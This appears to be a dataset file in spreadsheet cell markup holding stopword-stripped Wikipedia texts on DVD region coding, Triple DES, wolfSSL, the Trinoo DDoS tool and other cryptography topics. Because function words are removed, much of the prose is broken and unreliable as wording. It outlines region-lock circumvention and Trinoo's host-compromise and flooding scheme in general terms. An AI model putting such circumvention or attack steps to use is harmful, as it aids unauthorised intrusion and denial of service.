continue used (incorrectly) method identifying refresh rates vertical resolution. however, "ntsc", "pal" "secam" player analog composite video output (baseband modulated) produce ntsc, secam signals, respectively, outputs, play dvds identified corresponding format. ntsc analog format historically associated united states, canada, japan, south korea, mexico, philippines, taiwan, countries. analog color format historically associated europe, africa, china, india, australia, zealand, israel, north korea, countries (brazil adopted variant pal-m, uses refresh rate resolution commonly associated ntsc). secam, format associated french-speaking europe, using resolution refresh rate pal, distinct format uses different system color encoding. some players play discs identified ntsc, secam, others play multiple standards.in general, easier consumers pal/secam countries view ntsc dvds vice versa. almost players sold pal/secam countries capable playing kinds discs, modern handle converted signal. ntsc discs output player three different ways: using non-chroma encoded format scart ypbpr component video. using encoded composite video/s-video—a "hybrid" system uses ntsc's 525/60 line format along pal's chroma subcarrier using ntsc encoded composite video/s-video.however, ntsc players cannot play discs, ntsc accept 576i video signals used pal/secam dvds. those ntsc countries, united states, generally require region-free, multi-standard player multi-standard television view discs, converter box, whereas countries generally require region-free player view ntsc discs (with possible exception japanese discs european countries, since region means european region users could import japanese discs play players without obstacles.) there also differences pixel aspect ratio (720 image aspect ratio) display frame rate (29.97 25). most computer-based software hardware play ntsc video audio standards. blu-ray players, 1080p signals, backwards compatible ntsc dvds. implementations region codes standalone players usually configuration flag player's firmware factory. this flag holds region number machine allowed play. region-free players players shipped without ability enforce regional lockout (usually means chip ignores region coding), without flag set. however, player region-free, often unlocked unlock code entered remote control. this code simply allows user change factory-set configuration flag another region, special region "0". once unlocked way, player allows owner watch dvds region. many websites exist internet offering codes, often known informally hacks. many websites provide instructions different models standalone players, hack, factory codes. computer drives older drives rpc-1 (regional playback control) firmware, means drive allows dvds region play. newer drives rpc-2 firmware, enforces region coding hardware level. these drives often reflashed hacked rpc-1 firmware, effectively making drive region-free. this void drive warranty.some drives come region-free, user expected assign region case, programs prompt user select region, others actually assign region automatically based locale operating system. computer drives, users allowed change region code five times. number allowances reaches zero, region last used permanent even drive transferred another computer. this limit built drive's controller software, called firmware. resetting firmware count done first- third-party software tools, reflashing (see above) rpc-1 firmware. since software work correctly rpc-1 drives, also option reflashing drive so-called auto-reset firmware. this firmware appears rpc-2 firmware software, reset region changes counter whenever power cycled, reverting state drive never region code changed. software players most freeware open source players ignore region coding. vlc, example, attempt enforce region coding; however, requires access dvd's data overcome encryption, access available drives rpc-2 firmware playing disc different region region drive locked. most commercial players locked region code, easily changed software. other software, known region killers, transparently remove hide) region code software player. some also work around locked rpc-2 firmware. circumvention region coding circumvented making copy adds flags region codes, creating all-region dvd. backup software this, also remove macrovision, css, disabled user operations (uops). common region-locked dvds (but rce-dvds), region code stored file "video_ts.ifo" (table "vmgm_mat"), byte offsets eight regions correspond value power region corresponds (20), region (21), region (22), region corresponds (27). values region disc encoded added together give value file. example, disc encoded region regions value 2+4+8+16+32+64+128=254. disc encoded regions value 4+16+32+64+128=244. region-free rce-protected carry value zero, since regions excluded. video game consoles xbox, xbox 360, playstation playstation consoles region-locked playback. playstation modified regional-locking disabled modchips. although region locked film dvds film blu-ray discs, playstation playstation playstation xbox one, xbox series region free video games, though add-on content online store region locked must match region disc. blu-ray disc region codes blu-ray discs much simpler region-code system three regions, labeled dvds, many blu-rays encoded region (region free), making suitable players worldwide. unlike regions, blu-ray regions verified player software, computer system drive. region code stored file registry, hacks reset region counter player software. standalone players, region code part firmware. some blu-rays region-free. bypassing region codes, software multi-regional players available. form blu-ray region coding tests region player/player software, also country code. this means, example, japan region american discs play devices/software installed japan vice versa, since countries different country codes (the united states 21843 5553 ("us" ascii, according 3166-1), japan 19024, 4a50 ("jp"); canada 17217 4341 ("ca"). although three blu-ray regions, country code allows much precise control regional distribution blu-ray discs eight) regions. blu-ray discs, "special regions" regions dvds. region codes umd, disc type used playstation portable, movies region codes similar dvds, although many games region-free. criticism legal concerns region-code enforcement discussed possible violation world trade organization free trade agreements competition law. believed entities benefiting region coding movie studios, marketers code-free players decrypters. oceania australian competition consumer commission (accc) warned players enforce region-coding violate competition consumer 2010. december 2000 report accc advised consumers "exercise caution purchasing video player restrictions limit ability play imported dvds." report stated, "these restrictions artificially imposed group multinational film entertainment companies caused existing differences television display formats pal, ntsc secam [...] accc currently investigating whether australian consumers paying higher prices dvds ability copyright owners, film companies, prevent competition restricting imports countries (authorised) video titles sold cheaply." 2012, report sydney morning herald revealed region-free players legal australia, exempt technological protection measures (tpms) included free trade agreement. under zealand copyright law, region codes mechanisms players enforce legal protection. europe practice also criticized european commission march 2001 investigating whether resulting price discrimination amounts violation competition law. north america washington post highlighted region-coding major inconvenience travelers wish legally purchase dvds abroad return countries origin, students foreign languages, immigrants want watch films homeland foreign film enthusiasts. another criticism region-coding allows local censorship. example, region 1999 drama film eyes wide shut contains digital manipulations necessary film secure mpaa r-rating, whereas manipulations evident non–region discs. also broadcast television systems copy control association geo-blocking regional lockout references external links blu-ray region codes video standards brenton film region information regards home theater info region coding explanations help dvdcodes source amazon.co.uk regions guide</t>
  </si>
  <si>
    <t>Trace vector decoder</t>
  </si>
  <si>
    <t>trace vector decoder (tvd) computer software uses trace facility underlying microprocessor decode encrypted instruction opcodes just-in-time prior execution possibly re-encode afterwards. used hinder reverse engineering attempting prevent software cracking part overall copy protection strategy. microprocessor tracing certain microprocessor families (e.g. 680x0, x86) provide capability trace instructions program development. debugger might capability single step program, providing means programmer monitor execution program test. installing custom handler trace exception, possible gain control microprocessor execution normal program flow instructions. typical trace vector decoder exception handler decodes upcoming instruction located outside exception, well re-encoding previously decoded instruction. implementations motorola 680x0 motorola 68000 instruction-by-instruction tracing facility. when trace state enabled, processor automatically forces trace exception (non-exception) instruction executed. following assembly code snippet example program initializing trace exception handler 68000 system. following disassembly trace exception handler loaded stack. purpose handler obfuscate traced encrypted code. decryption process affected contents condition code register (ccr). example, arithmetic operation main program number result, cause zero flag ccr. this cause value (sp) changed trace exception handler. intel cpus provide trace flag generates interrupt execution instruction. following assembly code example might implemented 8086 system. following disassembly associated trace interrupt handler. examples copylock northen copylock system implemented amiga, atari platforms includes tvd. addition general software encryption, copylock obfuscates code accesses validates copy protected diskette. demoscene included voyage demo, written 680x0-based commodore amiga razor 1911. references</t>
  </si>
  <si>
    <t>CyaSSL+</t>
  </si>
  <si>
    <t>wolfssl small, portable, embedded ssl/tls library targeted embedded systems developers. open source implementation (ssl 3.0, 1.0, 1.1, 1.2, 1.3, dtls 1.0, 1.2, 1.3) written programming language. includes ssl/tls client libraries ssl/tls server implementation well support multiple apis, including defined tls. wolfssl also includes openssl compatibility interface commonly used openssl functions.a predecessor wolfssl, yassl based library embedded environments real time operating systems constrained resources. platforms wolfssl currently available win32/64, linux, macos, solaris, threadx, vxworks, freebsd, netbsd, openbsd, embedded linux, yocto project, openembedded, wince, haiku, openwrt, iphone, android, nintendo gamecube devkitpro support, qnx, montavista, tron variants, nonstop opencl, micrium's microc/os-ii, freertos, safertos, freescale mqx, nucleus, tinyos, ti-rtos, hp-ux, utasker, ut-kernel, embos, intime, mbed, riot, cmsis-rtos, frosted, green hills integrity, keil rtx, toppers, petalinux, apache mynewt, pikeos. history genesis yassl, another ssl, dates 2004. openssl available time, dual licensed openssl license ssleay license. yassl, alternatively, developed dual-licensed commercial license gpl. yassl offered modern api, commercial style developer support complete openssl compatibility layer. first major user wolfssl/cyassl/yassl mysql. through bundling mysql, yassl achieved extremely high distribution volumes millions. february 2019, daniel stenberg, creator curl, joined wolfssl project. protocols wolfssl lightweight library implements following protocols: 3.0, 1.0, 1.1, 1.2, dtls 1.0, dtls 1.2, dtls 1.3protocol notes: deprecated (prohibited) 2011 6176. wolfssl support deprecated (prohibited) 2015 7568. response poodle attack, disabled default since wolfssl 3.6.6, enabled compile-time option. algorithms wolfssl uses following cryptography libraries: wolfcrypt default, wolfssl uses cryptographic services provided wolfcrypt. wolfcrypt provides rsa, ecc, dss, diffie–hellman, edh, ntru, des, triple des, (cbc, ctr, ccm, gcm), camellia, idea, arc4, hc-128, chacha20, md2, md4, md5, sha-1, sha-2, sha-3, blake2, ripemd-160, poly1305, random number generation, large integer support, base 16/64 encoding/decoding. experimental cipher called rabbit, public domain software stream cipher eu's estream project, also included. rabbit potentially useful encrypting streaming media high performance, high demand environments. wolfcrypt also includes support recent curve25519 ed25519 algorithms. wolfcrypt acts back-end crypto implementation several popular software packages libraries, including kerberos (where enabled using build option). ntru cyassl+ includes ntru public encryption. addition ntru cyassl+ result partnership yassl security innovation. ntru works well mobile embedded environments reduced size needed provide security public systems. addition, known vulnerable quantum attacks. several cipher suites utilizing ntru available cyassl+ including aes-256, rc4, hc-128. wolfssl supports intel (software guard extensions). intel allows smaller attack surface area shown provide higher level security executing code without significant negative impact performance. hardware acceleration platforms supported supported trusted elements currently, wolfssl following supported trusted elements: stsafe atecc508a hardware encryption support following tables list wolfssl's support using various devices' hardware encryption various algorithms. "all" denotes 128, 192, 256-bit supported block sizes licensing wolfssl free software, licensed gpl-2.0-or-later license. also transport layer security comparison implementations comparison cryptography libraries gnutls network security services openssl references external links wolfssl/cyassl homepage wolfssl with chacha20 poly1305</t>
  </si>
  <si>
    <t>Triple DES</t>
  </si>
  <si>
    <t>cryptography, triple (3des tdes), officially triple data encryption algorithm (tdea triple dea), symmetric-key block cipher, applies cipher algorithm three times data block. data encryption standard's (des) 56-bit longer considered adequate face modern cryptanalytic techniques supercomputing power. released 2016, cve-2016-2183 disclosed major security vulnerability 3des encryption algorithms. this cve, combined inadequate size 3des, nist deprecated 3des applications 2017, applications 2023. replaced secure, robust aes. while government industry standards abbreviate algorithm's name tdes (triple des) tdea (triple data encryption algorithm), 1851 referred 3des time first promulgated idea, namesake since come wide vendors, users, cryptographers. history 1978, triple encryption method using 56-bit keys proposed walter tuchman; 1981 merkle hellman proposed secure triple version 3des bits security. standards triple data encryption algorithm variously defined several standards documents: 1851, triple transform (approved 1995) ansi x9.52-1998 triple data encryption algorithm modes operation (approved 1998, withdrawn 2008) fips 46-3 data encryption standard (des) (approved 1999, withdrawn 2005) nist special publication 800-67 revision recommendation triple data encryption algorithm (tdea) block cipher (approved 2017) iso/iec 18033-3:2010: part block ciphers (approved 2005) algorithm original cipher's size bits generally sufficient algorithm designed, availability increasing computational power made brute-force attacks feasible. triple provides relatively simple method increasing size protect attacks, without need design completely block cipher algorithm. naive approach increase strength block encryption algorithm short length (like des) would keys {\displaystyle (k1,k2)} instead one, encrypt block twice: plaintext {\displaystyle e_{k2}(e_{k1}({\textrm {plaintext}}))} original length {\displaystyle bits, would hope scheme provides security equivalent using {\displaystyle bits long. unfortunately, approach vulnerable meet-in-the-middle attack: given known plaintext pair {\displaystyle (x,y)} {\displaystyle y=e_{k2}(e_{k1}(x))} recover pair {\displaystyle (k1,k2)} {\displaystyle 2^{n+1}} steps, instead {\displaystyle 2^{2n}} steps would expect ideally secure algorithm {\displaystyle bits key. therefore, triple uses "key bundle" comprises three keys, {\displaystyle {\displaystyle {\displaystyle bits (excluding parity bits). encryption algorithm ciphertext plaintext {\displaystyle {\textrm {ciphertext}}=e_{k3}(d_{k2}(e_{k1}({\textrm {plaintext}}))).} that encrypt {\displaystyle decrypt {\displaystyle encrypt {\displaystyle decryption reverse: plaintext ciphertext {\displaystyle {\textrm {plaintext}}=d_{k1}(e_{k2}(d_{k3}({\textrm {ciphertext}}))).} that decrypt {\displaystyle encrypt {\displaystyle decrypt {\displaystyle each triple encryption encrypts block bits data. case middle operation reverse first last. this improves strength algorithm using keying option provides backward compatibility keying option keying options standards define three keying options: keying option three keys independent. sometimes known 3tdea triple-length keys. this strongest, independent bits. still vulnerable meet-in-the-middle attack, attack requires steps. keying option independent, sometimes known 2tdea double-length keys. this provides shorter length bits reasonable compromise keying option caveat above. this improvement "double des" requires steps attack. nist deprecated option. keying option three keys identical, i.e. this backward compatible des, since operations cancel out. iso/iec 18033-3 never allowed option, nist longer allows k3.each odd-parity bytes, bits bits error-detection. bundle requires bytes option option option nist (and current specifications version approved algorithms trusted platform module) also disallows using following 64-bit values keys (note binary complement others; keys also reverse permutation bytes others), listed hexadecimal byte, least significant odd-parity generated bit, discarded forming effective 56-bit keys): 01.01.01.01.01.01.01.01, fe.fe.fe.fe.fe.fe.fe.fe, e0.fe.fe.e0.f1.fe.fe.f1, 1f.01.01.1f.0e.01.01.0e, 01.01.fe.fe.01.01.fe.fe, fe.fe.01.01.fe.fe.01.01, e0.fe.01.1f.f1.fe.01.0e, 1f.01.fe.e0.0e.01.fe.f1, 01.01.e0.e0.01.01.f1.f1, fe.fe.1f.1f.fe.fe.0e.0e, e0.fe.1f.01.f1.fe.0e.01, 1f.01.e0.fe.0e.01.f1.fe, 01.01.1f.1f.01.01.0e.0e, fe.fe.e0.e0.fe.fe.f1.f1, e0.fe.e0.fe.f1.fe.f1.fe, 1f.01.1f.01.0e.01.0e.01, 01.fe.01.fe.01.fe.01.fe, fe.01.fe.01.fe.01.fe.01, e0.01.fe.1f.f1.01.fe.0e, 1f.fe.01.e0.0e.fe.01.f1, 01.fe.fe.01.01.fe.fe.01, fe.01.01.fe.fe.01.01.fe, e0.01.01.e0.f1.01.01.f1, 1f.fe.fe.1f.0e.fe.fe.0e, 01.fe.e0.1f.01.fe.f1.0e, fe.01.1f.e0.fe.01.0e.f1, e0.01.1f.fe.f1.01.0e.fe, 1f.fe.e0.01.0e.fe.f1.01, 01.fe.1f.e0.01.fe.0e.f1, fe.01.e0.1f.fe.01.f1.0e, e0.01.e0.01.f1.01.f1.01, 1f.fe.1f.fe.0e.fe.0e.fe, 01.e0.01.e0.01.f1.01.f1, fe.1f.fe.1f.fe.0e.fe.0e, e0.1f.fe.01.f1.0e.fe.01, 1f.e0.01.fe.0e.f1.01.fe, 01.e0.fe.1f.01.f1.fe.0e, fe.1f.01.e0.fe.0e.01.f1, e0.1f.01.fe.f1.0e.01.fe, 1f.e0.fe.01.0e.f1.fe.01, 01.e0.e0.01.01.f1.f1.01, fe.1f.1f.fe.fe.0e.0e.fe, e0.1f.1f.e0.f1.0e.0e.f1, 1f.e0.e0.1f.0e.f1.f1.0e, 01.e0.1f.fe.01.f1.0e.fe, fe.1f.e0.01.fe.0e.f1.01, e0.1f.e0.1f.f1.0e.f1.0e, 1f.e0.1f.e0.0e.f1.0e.f1, 01.1f.01.1f.01.0e.01.0e, fe.e0.fe.e0.fe.f1.fe.f1, e0.e0.fe.fe.f1.f1.fe.fe, 1f.1f.01.01.0e.0e.01.01, 01.1f.fe.e0.01.0e.fe.f1, fe.e0.01.1f.fe.f1.01.0e, e0.e0.01.01.f1.f1.01.01, 1f.1f.fe.fe.0e.0e.fe.fe, 01.1f.e0.fe.01.0e.f1.fe, fe.e0.1f.01.fe.f1.0e.01, e0.e0.1f.1f.f1.f1.0e.0e, 1f.1f.e0.e0.0e.0e.f1.f1, 01.1f.1f.01.01.0e.0e.01, fe.e0.e0.fe.fe.f1.f1.fe, e0.e0.e0.e0.f1.f1.f1.f1, 1f.1f.1f.1f.0e.0e.0e.0e, with restrictions allowed keys, triple reapproved keying options only. generally three keys generated taking bytes strong random generator keying option used (option needs random bytes, strong random generators hard assert considered best practice option encryption block block ciphers, encryption decryption multiple blocks data performed using variety modes operation, generally defined independently block cipher algorithm. however, x9.52 specifies directly, nist 800-67 specifies 800-38a modes shall used certain constraints necessarily apply general specifications modes. example, x9.52 specifies cipher block chaining, initialization vector shall different time, whereas iso/iec 10116 not. fips 46-3 iso/iec 18033-3 define single block algorithm, place restrictions modes operation multiple blocks. security general, triple three independent keys (keying option length bits (three 56-bit keys), meet-in-the-middle attack, effective security provides bits. keying option reduces effective size bits (because third first). however, option susceptible certain chosen-plaintext known-plaintext attacks, thus designated nist bits security. this considered insecure, and, consequence triple deprecated nist 2017. short block size bits makes 3des vulnerable block collision attacks used encrypt large amounts data key. sweet32 attack shows exploited openvpn. practical sweet32 attack 3des-based cipher-suites required 36.6 {\displaystyle 2^{36.6}} blocks (785 full attack, researchers lucky collision around {\displaystyle 2^{20}} blocks, took minutes. security tdea affected number blocks processed bundle. bundle shall used apply cryptographic protection (e.g., encrypt) {\displaystyle 2^{20}} 64-bit data blocks. openssl include 3des default since version 1.1.0 (august 2016) considers "weak cipher". usage electronic payment industry uses triple continues develop promulgate standards based upon emv.earlier versions microsoft onenote, microsoft outlook 2007 microsoft system center configuration manager 2012 triple password-protect user content system data. however, december 2018, microsoft announced retirement 3des throughout office service.firefox mozilla thunderbird triple mode encrypt website authentication login credentials using master password. implementations below list cryptography libraries support triple des: botan bouncy castle cryptlib crypto++ libgcrypt nettle openssl wolfssl trusted platform module (alias tpm, hardware implementation)some implementations include 3des default build, later recent versions. also des-x advanced encryption standard (aes) feistel cipher walter tuchman references notes</t>
  </si>
  <si>
    <t>Trinoo</t>
  </si>
  <si>
    <t>trinoo trin00 computer programs conduct ddos attack. believed trinoo networks thousands systems internet compromised remote buffer overrun exploits.the first suspected trinoo attacks described cert incident note 99–04. trinoo network connected february 2000 distributed denial service attack yahoo! website.trinoo famous allowing attackers leave message folder called cry_baby. file self replicating modified regular basis long port active. trinoo authored teenager orleans went alias phifli. using trinoo step attacker, using compromised host, compiles list machines compromised. most process done automatically compromised host, host stores mount information including find hosts compromise. step soon list machines compromised compiled, scripts compromise convert trinoo masters daemons. master control multiple daemons. daemons compromised hosts launch actual floods victim machine. step ddos attack launched attacker issues command master hosts. masters instruct every daemon start attack address specified command, many doss comprise ddos attack. also references external links trinoo description symantec trinoo analysis david dittrich trinoo source code</t>
  </si>
  <si>
    <t>Trim-Slice</t>
  </si>
  <si>
    <t>trim-slice small, fanless nettop computer manufactured israeli company compulab. trim-slice first commercially available desktop computer based nvidia tegra announced january 2011 began shipping late april 2011.in july 2013 compulab announced successor, utilite computer, single quad core computer based freescale i.mx6 since become popular fanless computers worldwide. also industrial references external links official website</t>
  </si>
  <si>
    <t>Cryptographic Message Syntax</t>
  </si>
  <si>
    <t>cryptographic message syntax (cms) ietf's standard cryptographically protected messages. used cryptographic schemes protocols digitally sign, digest, authenticate encrypt form digital data. based syntax pkcs turn based privacy-enhanced mail standard. newest version 2009) specified 5652 (but also 5911 updated asn.1 modules conforming asn.1 2002). architecture built around certificate-based management, profile defined pkix working group. used cryptographic component many cryptographic standards, s/mime, pkcs 3161 digital timestamping protocol. openssl open source software encrypt, decrypt, sign verify, compress uncompress documents. also cades advanced electronic signatures s/mime pkcs external links 8933 (update cryptographic message syntax (cms) algorithm identifier protection) 5652 (cryptographic message syntax (cms), use) 3852 (cryptographic message syntax (cms), obsolete) 3369 (cryptographic message syntax (cms), obsolete) 2630 (cryptographic message syntax, obsolete) 6268 (new asn.1 modules cryptographic message syntax (cms) s/mime, use) 5911 (new asn.1 modules cryptographic message syntax (cms) s/mime, updated) 5753 (using elliptic curve cryptography cms, use) 3278 (use elliptic curve cryptography (ecc) algorithms cryptographic message syntax (cms), obsolete) 5084 (using aes-ccm aes-gcm authenticated encryption cryptographic message syntax (cms), use)</t>
  </si>
  <si>
    <t>Cryptographic Service Provider</t>
  </si>
  <si>
    <t>microsoft windows, cryptographic service provider (csp) software library implements microsoft cryptoapi (capi). csps implement encoding decoding functions, computer application programs use, example, implement strong user authentication secure email. csps independent modules used different applications. user program calls cryptoapi functions redirected csps functions. since csps responsible implementing cryptographic algorithms standards, applications need concerned security details. furthermore, application define going calls cryptoapi. fact, cryptographic activity implemented csps. cryptoapi works bridge application csp. csps implemented basically special type special restrictions loading use. every must digitally signed microsoft signature verified windows loads csp. addition, loaded, windows periodically re-scans detect tampering, either malicious software computer viruses user him/herself trying circumvent restrictions (for example cryptographic length) might built csp's code. obtain signature, non-microsoft developers must supply paperwork microsoft promising obey various legal restrictions giving valid contact information. circa 2000, microsoft charge fees supply signatures. development testing purposes, developer configure windows recognize developer's signatures instead microsoft's, somewhat complex obscure operation unsuitable nontechnical users. capi/csp architecture origins restrictive government controls export cryptography. microsoft's default "base" included windows limited 512-bit public-key cryptography 40-bit symmetric cryptography, maximum lengths permitted exportable mass market software time. csps implementing stronger cryptography available u.s. residents, unless csps received u.s. government export approval. system requiring csps signed presentation completed paperwork intended prevent easy spread unauthorized csps implemented anonymous foreign developers. such, presented concession made microsoft government, order export approval capi itself. after bernstein united states court decision establishing computer source code protected free speech transfer cryptographic regulatory authority u.s. state department pro-export commerce department, restrictions lengths dropped, csps shipped windows include full-strength cryptography. main third-party csps interface external cryptography hardware hardware security modules (hsm) smart cards. smart card these cryptographic functions realised smart card, thus smart card microsoft pkcs#11. microsoft windows identifying correct smart card csp, used, analysing answer reset (atr) smart card, registered windows registry. installing csp, atrs supported smart cards enlisted registry. office password protection cryptographic service providers used encryption word, excel, powerpoint documents starting microsoft office standard encryption algorithm 40-bit used default, enabling enhances length thus makes decryption process continuous. this applies passwords required open document password type encrypts password-protected document. also single sign-on smartcard external links microsoft developer network page csps. java cryptography architecture cryptographic service provider iaik-jce cryptographic service provider</t>
  </si>
  <si>
    <t>Cryptographic accelerator</t>
  </si>
  <si>
    <t>computing, cryptographic accelerator co-processor designed specifically perform computationally intensive cryptographic operations, efficiently general-purpose cpu. because many servers' system load consists mostly cryptographic operations, greatly increase performance. intel's aes-ni common cryptographic accelerator commodity hardware. padlock another recent example. operating system support several operating systems provide support cryptographic hardware. family systems openbsd cryptographic framework (ocf), linux systems crypto api, solaris solaris cryptographic framework (scf) microsoft windows microsoft cryptoapi. some cryptographic accelerators offer machine instructions therefore used directly programs. libraries openssl libressl support cryptographic accelerators. almost unix-like operating systems openssl fork libressl cryptography library. these libraries cryptographic accelerators aes-ni available. also acceleration hardware-based encryption</t>
  </si>
  <si>
    <t>Cryptographic key types</t>
  </si>
  <si>
    <t>cryptographic string data used lock unlock cryptographic functions, including authentication, authorization encryption. cryptographic keys grouped cryptographic types according functions perform. description consider keyring contains variety keys. these keys might various shapes sizes, thing certain, generally serve separate purpose. might used start automobile, another might used open safety deposit box. automobile work open safety deposit vice versa. this analogy provides insight cryptographic types work. these keys categorized respect used properties possess. cryptographic categorized according used properties has. example, might following properties: symmetric, public private. keys also grouped pairs private public key, referred asymmetric pair. asymmetric versus symmetric keys asymmetric keys differ symmetric keys algorithms separate keys encryption decryption symmetric key’s algorithm uses single processes. because multiple keys used asymmetric algorithm, process takes longer produce symmetric algorithm would. however, benefits fact asymmetric algorithm much secure symmetric algorithm with symmetric key, needs transmitted receiver always possibility could intercepted tampered with. with asymmetric key, message and/or accompanying data sent received using public key; however, receiver sender would personal private access message and/or accompanying data. thus, asymmetric keys suited transmitting confidential messages data authentication required assurance message tampered with. only receiver, possession private key’s corresponding public key(encryption key), ability decode message. public sent back forth recipients, private remains fixed location sent back forth, keeps safe intercepted transmission. long term versus single cryptographic keys also keys designate used long-term (static, archived) used single session (ephemeral). latter generally applies ephemeral agreement key. most types designed last long crypto-periods years. when shorter crypto-period designed different types used, data encryption keys, symmetric authentication keys, private key-transport keys, key-wrapping keys, authorization keys keys. types this page shows classification types point view management. management system, labeled type never used different purpose. according nist 800-57 (revision following types keys exist: private signature private signature keys private keys asymmetric (public) pairs used public algorithms generate digital signatures possible long-term implications. when properly handled, private signature keys used provide authentication, integrity non-repudiation. public signature verification public signature verification public asymmetric pair used public algorithm verify digital signatures, either authenticate user's identity, determine integrity data, non-repudiation, combination thereof. symmetric authentication symmetric authentication keys used symmetric algorithms provide assurance integrity source messages, communication sessions, stored data. private authentication private authentication private asymmetric pair used public algorithm provide assurance integrity information, identity originating entity source messages, communication sessions, stored data. public authentication public authentication public asymmetric pair used public algorithm determine integrity information authenticate identity entities, source messages, communication sessions, stored data. symmetric data encryption these keys used symmetric algorithms apply confidentiality protection information. symmetric wrapping symmetric wrapping keys used encrypt keys using symmetric algorithms. wrapping keys also known encrypting keys. symmetric asymmetric random number generation keys these keys used generate random numbers. symmetric master symmetric master used derive symmetric keys (e.g., data encryption keys, wrapping keys, authentication keys) using symmetric cryptographic methods. private transport private transport keys private keys asymmetric pairs used decrypt keys encrypted associated public using public algorithm. transport keys usually used establish keys (e.g., wrapping keys, data encryption keys keys) and, optionally, keying material (e.g., initialization vectors). public transport public transport keys public keys asymmetric pairs used encrypt keys using public algorithm. these keys used establish keys (e.g., wrapping keys, data encryption keys keys) and, optionally, keying material (e.g., initialization vectors). symmetric agreement these symmetric keys used establish keys (e.g., wrapping keys, data encryption keys, keys) and, optionally, keying material (e.g., initialization vectors) using symmetric agreement algorithm. private static agreement private static agreement keys private keys asymmetric pairs used establish keys (e.g., wrapping keys, data encryption keys, keys) and, optionally, keying material (e.g., initialization vectors). public static agreement public static agreement keys public keys asymmetric pairs used establish keys (e.g., wrapping keys, data encryption keys, keys) and, optionally, keying material (e.g., initialization vectors). private ephemeral agreement private ephemeral agreement keys private keys asymmetric pairs used establish keys (e.g., wrapping keys, data encryption keys, keys) and, optionally, keying material (e.g., initialization vectors). public ephemeral agreement public ephemeral agreement keys public keys asymmetric pairs used single establishment transaction establish keys (e.g., wrapping keys, data encryption keys, keys) and, optionally, keying material (e.g., initialization vectors). symmetric authorization symmetric authorization keys used provide privileges entity using symmetric cryptographic method. authorization known entity responsible monitoring granting access privileges authorized entities entity seeking access resources. private authorization private authorization private asymmetric pair used provide privileges entity. public authorization public authorization public asymmetric pair used verify privileges entity knows associated private authorization key. references external links recommendation management part general, nist special publication 800-57 nist cryptographic toolkit</t>
  </si>
  <si>
    <t>Cryptographic primitive</t>
  </si>
  <si>
    <t>cryptographic primitives well-established, low-level cryptographic algorithms frequently used build cryptographic protocols computer security systems. these routines include, limited one-way hash functions encryption functions. rationale when creating cryptographic systems, designers cryptographic primitives basic building blocks. because this, cryptographic primitives designed specific task precisely defined highly reliable fashion. since cryptographic primitives used building blocks, must reliable, i.e. perform according specification. example, encryption routine claims breakable number computer operations, broken significantly fewer operations, cryptographic primitive failed. cryptographic primitive found fail, almost every protocol uses becomes vulnerable. since creating cryptographic routines hard, testing reliable takes long time, essentially never sensible (nor secure) design cryptographic primitive suit needs cryptographic system. reasons include: designer might competent mathematical practical considerations involved cryptographic primitives. designing cryptographic primitive time-consuming error-prone, even experts field. since algorithms field required designed well also need tested well cryptologist community, even cryptographic routine looks good design point view might still contain errors. successfully withstanding scrutiny gives confidence fact, far, confidence) algorithm indeed secure enough use; security proofs cryptographic primitives generally available.cryptographic primitives similar ways programming languages. computer programmer rarely invents programming language writing program; instead, already established programming languages program cryptographic primitives building blocks every crypto system, e.g., tls, ssl, ssh, etc. crypto system designers, position definitively prove security, must take primitives secure. choosing best primitive available protocol usually provides best available security. however, compositional weaknesses possible crypto system responsibility designer(s) avoid them. combining cryptographic primitives cryptographic primitives, own, quite limited. they cannot considered, properly, cryptographic system. instance, bare encryption algorithm provide authentication mechanism, explicit message integrity checking. only combined security protocols, security requirement addressed. example, transmit message encoded also protected tinkering (i.e. confidential integrity-protected), encoding routine, des, hash-routine sha-1 used combination. attacker know encryption key, modify message message digest value(s) would valid. combining cryptographic primitives make security protocol entire specialization. most exploitable errors (i.e., insecurities crypto systems) design errors primitives (assuming always chosen care), used, i.e. protocol design buggy careful enough implementation. mathematical analysis protocols time writing, mature. there basic properties verified automated methods, logic. there even methods full verification (e.g. calculus) extremely cumbersome cannot automated. protocol design requiring deep knowledge much practice; even mistakes common. illustrative example, real system, seen openssl vulnerability news page here. commonly used primitives one-way hash function, sometimes also called one-way compression function—compute reduced hash value message (e.g., sha-256) symmetric cryptography—compute ciphertext decodable used encode (e.g., aes) public-key cryptography—compute ciphertext decodable different used encode (e.g., rsa) digital signatures—confirm author message network—pool communications many users anonymize came private information retrieval—get database information without server knowing item requested commitment scheme—allows commit chosen value keeping hidden others, ability reveal later cryptographically secure pseudorandom number generator also category:cryptographic primitives list cryptographic primitives cryptographic agility references levente buttyán, istván vajda kriptográfia alkalmazásai (cryptography applications), typotex 2004, isbn 963-9548-13-8 menezes, alfred handbook applied cryptography, press, isbn 0-8493-8523-7, october 1996, pages. crypto101 introductory course cryptography, freely available programmers ages skill levels.</t>
  </si>
  <si>
    <t>Cryptographic splitting</t>
  </si>
  <si>
    <t>cryptographic splitting, also known cryptographic splitting cryptographic data splitting, technique securing data computer network. technique involves encrypting data, splitting encrypted data smaller data units, distributing smaller units different storage locations, encrypting data location. with process, data protected security breaches, even intruder able retrieve decrypt data unit, information would useless unless combined decrypted data units locations. history technology filed patent consideration june 2003, patent granted june 2008. technology cryptographic splitting utilizes combination different algorithms provide data protection. block data first encrypted using aes-256 government encryption standard. encrypted bits split different shares share hashed using national security agency's sha-256 algorithm. applications application cryptographic splitting provide security cloud computing. encrypted data subsets stored different clouds, information required restore data held private cloud additional security. security vendor security first corp uses technology secure parser extended (spx) product line.in 2009, technology services company unisys gave presentation using cryptographic splitting storage area networks. splitting data different parts storage area network, technique provided data redundancy addition security.computer giant written using technology part cloud data encryption services (icdes).the technology also written context effectively using sensitive corporate information, entrusting different individuals within company (trustees) different parts information. also secret sharing references</t>
  </si>
  <si>
    <t>Cryptographically secure pseudorandom number generator</t>
  </si>
  <si>
